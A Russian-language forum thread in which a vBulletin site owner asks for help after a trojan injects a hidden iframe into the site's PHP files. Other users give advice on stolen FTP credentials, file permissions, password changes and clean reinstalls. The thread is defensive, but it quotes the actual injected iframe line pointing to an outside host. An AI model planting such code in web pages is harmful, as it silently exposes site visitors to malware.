Проблема на хостинге: iframe inject - Безопасность

HOTMAN · 08.07.2009, 21:00

Хотелось бы попросить многоуважаемую публику помочь мне в решении следующей проблемы. После обновления vbulletin с линейки 3.6 на 3.8 наш форум стал выдавать нас следующую ошибку:

Parse error: syntax error, unexpected T_STRING in /usr/home/forum.psifactor.ru/htdocs/index.php on line 482

После проверки кода мы обнаружли что наши файлы были атакованы каким то трояном вставляющим в index.php код следующего содержания:

Код HTML:

<iframe src="http://c7h.ru:8080/index.php" width=139 height=193 style="visibility: hidden"></iframe>

Причем вставляет он это не только в index.php, но и в login.php и главный файл админки.

Мы проверили всё что можно и убедились что скорее всего данный троян сидит гдето на хостинге, однако доказать это провайдеру не представляется возможным.

В связи с этим хотелось бы спросить может ли ктото объяснить как нам защитить файлы нашего форума. Заранее спасибо за помощь.

*Plague* · 08.07.2009, 21:10

Цитата:

Сообщение от HOTMAN

скорее всего данный троян сидит гдето на хостинге

а можно узнать, откуда такая уверенность???
в первую очередь, привет товарищам что пароли фтп хранят где ни попадя. в тотал командере, например. хотя последние его бета-версии (7.5) умеют вроде нормально шифровать. и не он один хранит пароли в таком виде что первый же залетный троян вскрывает их на раз-два.

вопрос не по разделу, vb здесь совершенно не причем, переношу в безопасность.

Да, кстати, chmod ugo-w на все php файлы спасет по идее. но троя всеже искать надо, это не метод..

boor · 08.07.2009, 21:21

Цитата:

Сообщение от HOTMAN

троян сидит гдето на хостинге

Не факт!
Тебе правильно подсказали. скорее всего у вас украли пароль от фтп.
1) меняйте срочно все пароли!!!!(фтп, панель управления хостингом )
2) проверяйте компа на вирусы и желательно в безопасном режиме.

HOTMAN · 08.07.2009, 21:31

Компы мы уже проверяли...также как и все файлы скрипта...пароль тоже меняли...

Вопрос можно ли както изменить сам код файлов чтобы запретить прописывание туда кода трояна?

*Plague* · 08.07.2009, 21:40

Цитата:

Сообщение от HOTMAN

Вопрос можно ли както изменить сам код файлов чтобы запретить прописывание туда кода трояна?

я написал же. chmod ugo-w -R *.php
но это не выход, ребята.

VB кстати белый, иль левый? если левый версию говори, скину список файлов с белого. может еще туда кто скрипт левый подсунул.

HOTMAN · 08.07.2009, 21:57

VB нуленный...скачен с vbsupport где до этого не наблюдалось проблемых версий...Версия форум 3.8.3.
За файлы огромнейшее спасибо. Адрес почты:

*Plague* · 08.07.2009, 22:35

ну да, там по идее хорошо смотрят за этим делом.

Цитата:

Сообщение от HOTMAN

За файлы огромнейшее спасибо.

нууу, сам движок я сливать не собираюсь

а список файлов файлов я и здесь положить могу, ничего криминального в этом нет. хотя повторяю, на vbsupport народ толковый, думаю давно бы уж просекли если чего не так бы было. значит проблема на вашей стороне ©

HOTMAN · 08.07.2009, 22:56

Ещё раз спасибо. Я уже просил на vbsupport помощи. Они меня послали к хостеру и удалили тему. Проблема в том что доказать чтото хостеру нереально. Потому я и ищу альтернативные варианты защиты.
Вот по списку пройдусь теперь. Можно ли сделать чтото ещё?

*Plague* · 08.07.2009, 23:15

Цитата:

Сообщение от HOTMAN

Потому я и ищу альтернативные варианты защиты.

есть лечение болезни симптоматическое, а есть лечение полное. вот то что ты ищешь - это есть симптоматическое. и я его уже дважды написал.

первое что нужно сделать, это как уже сказали - поменять пароли фтп, ssh, панели, и нигде их не сохранять (карандаш и бумагу еще никто не отменял). пароли ставить ацкие. типа oeh6IgE_+B^tosX7771b. для всяческих веб панелей юзать firefox, а не насквозь дырявый ИЕ. Следующее что нужно сделать - это не спешить их раздавать если они еще кому-то нужны. и в это время, когда все изменено, смотреть - появится ли снова этот инжект. если нет - начать выдавать поочереди. в первую очередь себе. всмысле сохранить в электронном виде. после кого появится - брать биту и идти к нему в гости, компутер починять.
а еще не лишним было бы написать что за хостинг (дед, вдс, web)

HOTMAN · 08.07.2009, 23:49

Цитата:

Сообщение от Plague

а еще не лишним было бы написать что за хостинг (дед, вдс, wеб)

Когдато мы его получили на sub.ru. За советы огромное спасибо.

*Plague* · 09.07.2009, 00:00

так. если тут и дальше будут испытывать мои телепатические способности, я последую примеру вбсуппорт, честное слово. сколько я еще должен инфу вытягивать??

что за хостинг? Меня не интересует кто его предоставляет, меня интересует техническая информация: dedicated/VDS/Web-hosting? Ось (UNIX/Windows)?

boor · 22.07.2009, 15:08

HOTMAN,
Ещё раз смотрите свои компы.
Потом заберите форум на локальную тачку, и проверьте на тему левого кода.
Если есть доступ по ssh то clamav проверьте, если там у вас где-то шел висит он его найдет и скажет об этом.
Чудес не бывает. Хостер просто даёт место, а вся бойда происходит из под конкретного пользователя. тобиш из под вашего акка.

1Hero · 11.08.2009, 00:46

в аналогичной ситуации когда я обнаружил код iframe inject в файлах своего сайта я тупо пересобрал руками форум + моды к нему из оригинальных дистрибутивов от авторов и залинковал конфиги на старую базу. таким образом у меня была 100% гарантия что сайт чист. не вижу смысла искать изменения, цена пропущенной дыры - повторный взлом сайта.

на тему хостера... 95% что виноваты вы сами и только 5% что действительно был взломан хостер.(не все конторы достаточно чистоплотны в этом вопросе).
"Мы проверили всё что можно... " вопрос в том чем вы проверяли. например NOD32 вобще антивирем называть сложно. используйте нормальные антивири, ужесточите политику безопасности на рабочих местах операторов и админа сайта.

06.04.2010, 23:16

99% случаев подобных это троян на пк. Ему неважно какой у вас пароль. При соединении он переписывает файл и отправлет такой как ему нужно.
Тотал в этом случае вообще дырявый. Советую сменить пароль и использовать фтп программы которые имеют более высокое качество шифрования пасов (это на случай если троят не будет найден).

SinClaus · 07.04.2010, 15:32

Есть путь гораздо проще, избавляет от кучи проблем - пора завязывать с виндой. Особенно веб-программерам и админам.

08.04.2010, 02:13

Выход реальный но мало кто согласится

SinClaus · 08.04.2010, 15:08

Можно подумать что на каторгу загоняют...

Многие работают в Линуксе и нужды в винде не имеют вообще.

08.04.2010, 15:32

Для, вас, для меня может и так.
Но если человек утром контру ганяет а вечером сайт делает, ему не удобно

08.07.2009, 21:57	# 6
HOTMAN Junior Member Регистрация: 19.11.2004 Сообщения: 119	VB нуленный...скачен с vbsupport где до этого не наблюдалось проблемых версий...Версия форум 3.8.3. За файлы огромнейшее спасибо. Адрес почты: Последний раз редактировалось HOTMAN; 08.07.2009 в 22:10.

09.07.2009, 00:00	# 11
Plague Administrator Регистрация: 06.05.2003 Адрес: Московская Подводная Лодка Пол: Male Сообщения: 12 059	так. если тут и дальше будут испытывать мои телепатические способности, я последую примеру вбсуппорт, честное слово. сколько я еще должен инфу вытягивать?? что за хостинг? Меня не интересует кто его предоставляет, меня интересует техническая информация: dedicated/VDS/Web-hosting? Ось (UNIX/Windows)? __________________ все "спасибы" - в приват и в репутацию! не засоряйте форум!!!! ~~~~~~~~~~~~~~~~~~~~~~ The time has come it is quite clear, our antichrist is ~~almost~~ already here. M.M.

22.07.2009, 15:08	# 12
boor ::VIP:: Хрюндель Регистрация: 27.10.2002 Адрес: Столица блин Сообщения: 650	HOTMAN, Ещё раз смотрите свои компы. Потом заберите форум на локальную тачку, и проверьте на тему левого кода. Если есть доступ по ssh то clamav проверьте, если там у вас где-то шел висит он его найдет и скажет об этом. Чудес не бывает. Хостер просто даёт место, а вся бойда происходит из под конкретного пользователя. тобиш из под вашего акка. __________________ Если Вас выписали из сумасшедшего дома, это не значит, что Вас вылечили. Просто Вы стали как все. Последний раз редактировалось boor; 22.07.2009 в 15:10.

07.04.2010, 15:32	# 15
SinClaus Котозавр Регистрация: 15.04.2003 Адрес: Russia, Tomsk Пол: Male Сообщения: 1 324	Есть путь гораздо проще, избавляет от кучи проблем - пора завязывать с виндой. Особенно веб-программерам и админам. __________________ Паранойю у админов лечить нельзя, надо лишь следить, чтобы развивалась в нужном направлении

08.04.2010, 15:08	# 17
SinClaus Котозавр Регистрация: 15.04.2003 Адрес: Russia, Tomsk Пол: Male Сообщения: 1 324	Можно подумать что на каторгу загоняют... Многие работают в Линуксе и нужды в винде не имеют вообще. __________________ Паранойю у админов лечить нельзя, надо лишь следить, чтобы развивалась в нужном направлении

08.07.2009, 21:00	# 1
HOTMAN Junior Member Регистрация: 19.11.2004 Сообщения: 119	Проблема на хостинге: iframe inject Хотелось бы попросить многоуважаемую публику помочь мне в решении следующей проблемы. После обновления vbulletin с линейки 3.6 на 3.8 наш форум стал выдавать нас следующую ошибку: Parse error: syntax error, unexpected T_STRING in /usr/home/forum.psifactor.ru/htdocs/index.php on line 482 После проверки кода мы обнаружли что наши файлы были атакованы каким то трояном вставляющим в index.php код следующего содержания: Код HTML: <iframe src="http://c7h.ru:8080/index.php" width=139 height=193 style="visibility: hidden"></iframe> Причем вставляет он это не только в index.php, но и в login.php и главный файл админки. Мы проверили всё что можно и убедились что скорее всего данный троян сидит гдето на хостинге, однако доказать это провайдеру не представляется возможным. В связи с этим хотелось бы спросить может ли ктото объяснить как нам защитить файлы нашего форума. Заранее спасибо за помощь. Последний раз редактировалось Plague; 08.07.2009 в 21:23. Причина: тег html для кого придумали?

08.07.2009, 21:31	# 4
HOTMAN Junior Member Регистрация: 19.11.2004 Сообщения: 119	Компы мы уже проверяли...также как и все файлы скрипта...пароль тоже меняли... Вопрос можно ли както изменить сам код файлов чтобы запретить прописывание туда кода трояна?

08.07.2009, 22:56	# 8
HOTMAN Junior Member Регистрация: 19.11.2004 Сообщения: 119	Ещё раз спасибо. Я уже просил на vbsupport помощи. Они меня послали к хостеру и удалили тему. Проблема в том что доказать чтото хостеру нереально. Потому я и ищу альтернативные варианты защиты. Вот по списку пройдусь теперь. Можно ли сделать чтото ещё?

11.08.2009, 00:46	# 13
1Hero Newbie Регистрация: 13.04.2009 Сообщения: 14	в аналогичной ситуации когда я обнаружил код iframe inject в файлах своего сайта я тупо пересобрал руками форум + моды к нему из оригинальных дистрибутивов от авторов и залинковал конфиги на старую базу. таким образом у меня была 100% гарантия что сайт чист. не вижу смысла искать изменения, цена пропущенной дыры - повторный взлом сайта. на тему хостера... 95% что виноваты вы сами и только 5% что действительно был взломан хостер.(не все конторы достаточно чистоплотны в этом вопросе). "Мы проверили всё что можно... " вопрос в том чем вы проверяли. например NOD32 вобще антивирем называть сложно. используйте нормальные антивири, ужесточите политику безопасности на рабочих местах операторов и админа сайта.

06.04.2010, 23:16	# 14
WebGraf Guest Сообщения: n/a	99% случаев подобных это троян на пк. Ему неважно какой у вас пароль. При соединении он переписывает файл и отправлет такой как ему нужно. Тотал в этом случае вообще дырявый. Советую сменить пароль и использовать фтп программы которые имеют более высокое качество шифрования пасов (это на случай если троят не будет найден).

08.04.2010, 02:13	# 16
WebGraf Guest Сообщения: n/a	Выход реальный но мало кто согласится

08.04.2010, 15:32	# 18
WebGraf Guest Сообщения: n/a	Для, вас, для меня может и так. Но если человек утром контру ганяет а вечером сайт делает, ему не удобно